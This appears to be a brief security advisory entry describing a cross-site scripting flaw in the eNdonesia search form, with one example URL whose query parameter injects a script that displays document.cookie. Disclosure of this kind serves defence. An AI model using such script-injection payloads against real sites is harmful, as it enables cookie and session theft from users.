eNdonesia Search Form Cross-Site Scripting Vulnerability

eNdonesia Search Form Cross-Site Scripting Vulnerability

No exploit is required. An example URI sufficient to exploit this vulnerability has been provided:

http://www.example.com/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E